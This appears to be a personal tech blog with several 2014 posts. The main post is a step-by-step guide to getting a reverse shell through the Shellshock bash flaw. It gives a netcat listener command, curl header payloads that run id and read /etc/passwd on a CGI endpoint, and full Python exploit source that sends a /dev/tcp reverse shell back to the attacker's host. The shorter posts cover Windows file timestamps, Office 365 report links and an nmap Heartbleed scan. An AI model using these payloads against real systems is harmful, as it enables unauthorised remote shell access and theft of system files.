Monday, October 20, 2014

How to get reverse shell with BASH (shellshock) vulnerability?

Pre-require:
1. Kali Linux
2.  Download the python code from http://pastebin.com/166f8Rjx and save as “shellshock.py”

3. If you are trying to attack an https site, change line 12 to conn = httplib.HTTPSConnection(sys.argv[1]), here I save it as “shellshocks.py”


4. Your Kali Linux IP
5. The vulnerable host IP


Steps

1. Run command “nc –lvp 9999”, listening on port 9999, you can change the port number if you want.

  
2. Open another window and run command “python shellshocks.py 10.10.x.x /ucsm/isSamInstalled.cgi 172.16.x.x/9999”. 10.10.x.x is the vulnerable host. 172.16.x.x is my Kali Linux IP.


3. Now you can get the shell:



Some commands that can be used to verify Shellshock:
1. curl --insecure -H "User-Agent: () { ignored; }; echo Content-Type: text/plain ; echo ; echo ; /usr/bin/id" https://10.10.x.x/ucsm/isSamInstalled.cgi
2. curl --insecure -H "User-Agent: () { ignored; }; echo Content-Type: text/plain ; echo ; echo ; /bin/cat /etc/passwd" https://10.10.x.x/ucsm/isSamInstalled.cgi
3. curl --insecure -A "X: () { :;}; echo; /bin/cat /etc/passwd; 2>&1; exit" https://10.10.x.x/ucsm/isSamInstalled.cgi

Appendix: the source code (from http://pastebin.com/166f8Rjx)
#
#CVE-2014-6271 cgi-bin reverse shell
#

import httplib,urllib,sys

if (len(sys.argv)<4 br="">    print "Usage: %s " % sys.argv[0]
    print "Example: %s localhost /cgi-bin/test.cgi 10.0.0.1/8080" % sys.argv[0]
    exit(0)

conn = httplib.HTTPConnection(sys.argv[1])
reverse_shell="() { ignored;};/bin/bash -i >& /dev/tcp/%s 0>&1" % sys.argv[3]

headers = {"Content-type": "application/x-www-form-urlencoded",
    "test":reverse_shell }
conn.request("GET",sys.argv[2],headers=headers)
res = conn.getresponse()
print res.status, res.reason
data = res.read()
print data

Wednesday, August 13, 2014

Change file timestamp in Windows

Sometimes you need to modify a file’s timestamp and don’t want to change the content of the file. Copy command has an easy way to do it:

copy /b filename.ext +,,

This command will assign the current time and date to filename.ext without modifying the file content.  It will replace the original file, so make sure you have a backup for the file.

For reference, check: http://technet.microsoft.com/en-us/library/bb490886.aspx

Tuesday, July 15, 2014

office 365 reports links


The weird of office 365 reports is you cannot get some reports from the admin portal. below is the links of these reports:

 












However, it cannot handle the result that returns more than thousands lines, you will have to install an Excel add-on for it: http://www.microsoft.com/en-us/download/details.aspx?id=30716

Tuesday, April 22, 2014

Use NMAP to detect OPENSSL heartbleeding vulnerability

NMAP 6.46 (http://nmap.org/download.html) includes the openssl heartbleed script:


To use it, below is a sample command:
nmap -sV -v -p 0-65535 --script=ssl-heartbleed -iL ./hosts.txt -oX ./result.xml
Parameter description:
-sV: Probe open ports to determine service/version info
-v: Increase verbosity level
-iL : Input from list of hosts/networks
-oX: output scan in XML format.
A sample output as below:



If for some reason, you cannot install nmap 6.46, you can manually download ssl-heartbleed.nse from http://nmap.org/nsedoc/scripts/ssl-heartbleed.html and put it in the NMAP scripts folder. You may need tls library to run the heartbleed script. Download it from http://nmap.org/nsedoc/lib/tls.html and put it in NMAP nselib folder.